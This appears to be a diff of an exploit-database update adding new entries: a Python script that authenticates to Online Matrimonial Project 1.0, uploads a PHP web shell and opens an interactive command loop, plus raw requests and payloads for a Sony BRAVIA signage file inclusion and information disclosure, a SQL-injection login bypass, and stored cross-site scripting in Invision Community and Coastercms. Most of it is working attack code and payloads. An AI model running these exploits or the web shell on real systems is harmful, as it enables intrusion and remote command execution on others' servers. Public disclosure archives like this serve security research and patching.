DB: 2020-12-04

9 changes to exploits/shellcodes

Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities
Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
Coastercms 5.8.18 - Stored XSS
EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting
Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting

exploits/hardware/webapps/49186.txt

@@ -0,0 +1,69 @@
+# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion
+# Date: 20.09.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://pro-bravia.sony.net
+# Version: 1.7.8
+
+Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion
+
+
+Vendor: Sony Electronics Inc.
+Product web page: https://pro-bravia.sony.net
+                  https://pro-bravia.sony.net/resources/software/bravia-signage/
+                  https://pro.sony/ue_US/products/display-software
+Affected version: <=1.7.8
+
+Summary: Sony's BRAVIA Signage is an application to deliver
+video and still images to Pro BRAVIAs and manage the information
+via a network. Features include management of displays, power
+schedule management, content playlists, scheduled delivery
+management, content interrupt, and more. This cost-effective
+digital signage management solution is ideal for presenting
+attractive, informative visual content in retail spaces and
+hotel reception areas, visitor attractions, educational and
+corporate environments.
+
+Desc: BRAVIA digital signage is vulnerable to a remote file
+inclusion (RFI) vulnerability by including arbitrary client-side
+dynamic scripts (JavaScript, VBScript, HTML) when adding content
+though the input URL material of type html. This allows hijacking
+the current session of the user, execute cross-site scripting code
+or changing the look of the page and content modification on current
+display.
+
+Tested on: Microsoft Windows Server 2012 R2
+           Ubuntu
+           NodeJS
+           Express
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5612
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php
+
+
+20.09.2020
+
+--
+
+
+Request:
+--------
+
+POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1
+Host: 192.168.1.20:8080
+Proxy-Connection: keep-alive
+Content-Length: 468
+Accept: application/json, text/plain, */*
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36
+Content-Type: application/json;charset=UTF-8
+Origin: http://192.168.1.20:8080
+Referer: http://192.168.1.20:8080/test.txt
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: io=RslVZVH6Dc8WsOn5AAAJ
+
+{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}}

exploits/hardware/webapps/49187.txt

@@ -0,0 +1,52 @@
+# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure
+# Date: 20.09.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://pro-bravia.sony.net
+# Version: 1.7.8
+
+Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure
+
+
+Vendor: Sony Electronics Inc.
+Product web page: https://pro-bravia.sony.net
+                  https://pro-bravia.sony.net/resources/software/bravia-signage/
+                  https://pro.sony/ue_US/products/display-software
+Affected version: <=1.7.8
+
+Summary: Sony's BRAVIA Signage is an application to deliver
+video and still images to Pro BRAVIAs and manage the information
+via a network. Features include management of displays, power
+schedule management, content playlists, scheduled delivery
+management, content interrupt, and more. This cost-effective
+digital signage management solution is ideal for presenting
+attractive, informative visual content in retail spaces and
+hotel reception areas, visitor attractions, educational and
+corporate environments.
+
+Desc: The application is vulnerable to sensitive information
+disclosure vulnerability. An unauthenticated attacker can
+visit several API endpoints and disclose information running
+on the device.
+
+Tested on: Microsoft Windows Server 2012 R2
+           Ubuntu
+           NodeJS
+           Express
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5610
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php
+
+
+20.09.2020
+
+--
+
+
+$ curl http://192.168.1.20:8080/api/system
+
+{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"}

exploits/multiple/webapps/49182.txt

@@ -0,0 +1,20 @@
+# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass
+# Date: 02-12-2020
+# Exploit Author: Mayur Parmar(th3cyb3rc0p)
+# Vendor Homepage: http://egavilanmedia.com
+# Software Link : http://egavilanmedia.com/egm-address-book/
+# Version: 1.0
+# Tested on: PopOS
+
+Attack Vector:
+An attacker can gain admin panel access using malicious sql injection queries.
+
+Steps to reproduce:
+1. Open admin login page using following URl:
+-> http://localhost/Address%20Book/login.php
+
+2. Now put below Payload in both the fields( User ID & Password)
+Payload: admin' or '1'='1
+
+3. Server accepted our payload and we bypassed cpanel without any
+credentials

exploits/multiple/webapps/49188.txt

@@ -0,0 +1,39 @@
+# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting 
+# Date: 02-12-2020
+# Exploit Author: Hemant Patidar (HemantSolo)
+# Vendor Homepage: https://invisioncommunity.com/
+# Software Link: https://invisioncommunity.com/buy
+# Version: 4.5.4
+# Tested on: Windows 10/Kali Linux
+
+Vulnerable Parameters: Profile - Field Name.
+
+Steps-To-Reproduce:
+1. Go to the Invision Community admin page.
+2. Now go to the Members - MEMBER SETTINGS - Profiles.
+3. Now click on Add Profile field.
+4. Put the below payload in Field Name:
+"<script>alert(123)</script>"
+5. Now click on Save button.
+6. The XSS will be triggered.
+
+
+POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
+Host: 127.0.0.1
+Connection: close
+Content-Length: 660
+Accept: */*
+DNT: 1
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://127.0.0.1
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
+Cookie: XYZ
+
+form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=

exploits/php/webapps/49137.txt

@@ -5,6 +5,7 @@
 # Software Link: https://lepton-cms.org/english/download/archive.php
 # Version: 4.7.0
 # Tested on: Windows 10/Kali Linux
+# CVE: CVE-2020-29240
 
 Stored Cross-site scripting(XSS):
 Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.

exploits/php/webapps/49181.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Coastercms 5.8.18 - Stored XSS
+# Exploit Author: Hardik Solanki
+# Vendor Homepage: https://www.coastercms.org/
+# Software Link: https://www.coastercms.org/
+# Version: 5.8.18
+# Tested on Windows 10
+
+XSS IMPACT:
+1: Steal the cookie
+2: User redirection to a malicious website
+
+Vulnerable Parameters: Edit Page tab
+
+Steps to reproduce:
+1: Navigate to "http://localhost/admin/login" and log in with
+admin credentials.
+2:- Then after login navigates to "Page --> Homepage --> Our Blog" and
+click on the edit page.
+3: Then add the payload "<script>alert(123)</script>" & Payload
+"<h1>test</h1>", and cliock on update button. Saved succesfully.
+4: Now, click on "View live page" and it will redirect you to the live page
+at "http://localhost/homepage/blog" and XSS will get stored and
+trigger on the main home page

exploits/php/webapps/49183.py

@@ -0,0 +1,94 @@
+# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
+# Exploit Author: Valerio Alessandroni
+# Date: 2020-10-07
+# Vendor Homepage: https://projectworlds.in/
+# Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/
+# Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php
+# Version: 1.0
+# Tested On: Server Linux Ubuntu 18.04, Apache2
+# Version: Python 2.x
+# Impact: Code Execution
+# Affected components: Affected move_uploaded_file() function in functions.php file.
+# Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
+# Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed.
+#
+# Additional information:
+#
+# To exploit this vulnerability:
+# 1) register a not privileged user at /register.php
+# 2) login in the application /login.php
+# 3) keep note of the redirect with the GET 'id' parameter  /userhome.php?id=[ID]
+# 4) go to the page /photouploader.php?id=[ID]
+# 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "<?php system($_GET['cmd']); ?>"
+# 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php
+# 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND]
+#
+# How to use it:
+# python exploit.py [URL] [USERNAME] [PASSWORD]
+
+
+import requests, sys, urllib, re, time
+from colorama import Fore, Back, Style
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def webshell(SERVER_URL, ID, FILE_NAME):
+    try:
+        print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...')
+        time.sleep(1)
+        WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME
+        getCMD  = {'cmd': 'echo ciao'}
+        r2 = requests.get(WEB_SHELL, params=getCMD)
+        status = r2.status_code
+        if status != 200:
+            print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
+            r2.raise_for_status()
+        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
+        while True:
+             
+             inputCMD = raw_input('$ ')
+             command = {'cmd': inputCMD}
+             r2 = requests.get(WEB_SHELL, params=command, verify=False)
+             print r2.text
+    except:
+        print("\r\nExiting.")
+        sys.exit(-1)
+
+def printHeader():
+     print(Fore.GREEN+"___  ___              _  _          _ "+Fore.RED+"     ______  _____  _____")
+     print(Fore.GREEN+"|  \/  |             (_)| |        | |"+Fore.RED+"     | ___ \/  __ \|  ___|")
+     print(Fore.GREEN+"| .  . |  __ _  _ __  _ | |_  __ _ | |"+Fore.RED+"     | |_/ /| /  \/| |__  ")
+     print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+"     |    / | |    |  __| ")
+     print(Fore.GREEN+"| |  | || (_| || |   | || |_| (_| || |"+Fore.RED+"     | |\ \ | \__/\| |___ ")
+     print(Fore.GREEN+"\_|  |_/ \__,_||_|   |_| \__|\__,_||_|"+Fore.RED+"     \_| \_| \____/\____/ ")
+     print ''                                                       
+
+
+
+if __name__ == "__main__":
+    printHeader()
+    if len(sys.argv) != 4:
+        print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0])
+        print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0])
+        sys.exit(-1)
+    SERVER_URL = sys.argv[1]
+    SERVER_URI = SERVER_URL + 'auth/auth.php'
+    LOGIN_PARAMS = {'user': '1'}
+    LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
+    req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False)
+    print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...')
+    time.sleep(1)
+    for resp in req.history:
+        COOKIES = resp.cookies.get_dict()
+        SPLITTED = resp.headers["location"].split("=")
+        ID = SPLITTED[1]
+    print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].')
+    time.sleep(1)
+    SERVER_URI = SERVER_URL + 'photouploader.php'
+    LOGIN_PARAMS = {'id': ID}
+    LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'}
+    FILE_NAME = 'shell.php'
+    FILES = {'pic1': (FILE_NAME, '<?php system($_GET[\'cmd\']); ?>'), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')}
+    req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False)
+    print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.')
+    time.sleep(1)
+    webshell(SERVER_URL, ID, FILE_NAME)

exploits/windows/remote/43936.py

@@ -72,7 +72,7 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 try:
 
-    print "[*] Testing connection to tatget %s:%s" %(host,port)
+    print "[*] Testing connection to target %s:%s" %(host,port)
     s.connect((host, port))
 
 except:

files_exploits.csv

@@ -43369,7 +43369,8 @@ id,file,description,date,author,type,platform,port
 49136,exploits/php/webapps/49136.txt,"Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-01,"Saeed Bala Ahmed",webapps,php,
 49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,
 49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,
-49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
+49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2020-12-01,"Matthew Aberegg",webapps,php,
+49183,exploits/php/webapps/49183.py,"Online Matrimonial Project 1.0 - Authenticated Remote Code Execution",2020-12-03,"Valerio Alessandroni",webapps,php,
 49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
 49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
 49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,
@@ -43399,3 +43400,9 @@ id,file,description,date,author,type,platform,port
 49175,exploits/php/webapps/49175.txt,"Simple College Website 1.0 - 'page' Local File Inclusion",2020-12-02,Mosaaed,webapps,php,
 49177,exploits/php/webapps/49177.txt,"Car Rental Management System 1.0 - SQL Injection / Local File include",2020-12-02,Mosaaed,webapps,php,
 49178,exploits/php/webapps/49178.bash,"WordPress Plugin Wp-FileManager 6.8 - RCE",2020-12-02,"Mansoor R",webapps,php,
+49181,exploits/php/webapps/49181.txt,"Coastercms 5.8.18 - Stored XSS",2020-12-03,"Hardik Solanki",webapps,php,
+49182,exploits/multiple/webapps/49182.txt,"EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass",2020-12-03,"Mayur Parmar",webapps,multiple,
+49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,
+49186,exploits/hardware/webapps/49186.txt,"Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion",2020-12-03,LiquidWorm,webapps,hardware,
+49187,exploits/hardware/webapps/49187.txt,"Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure",2020-12-03,LiquidWorm,webapps,hardware,
+49188,exploits/multiple/webapps/49188.txt,"Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting",2020-12-03,"Hemant Patidar",webapps,multiple,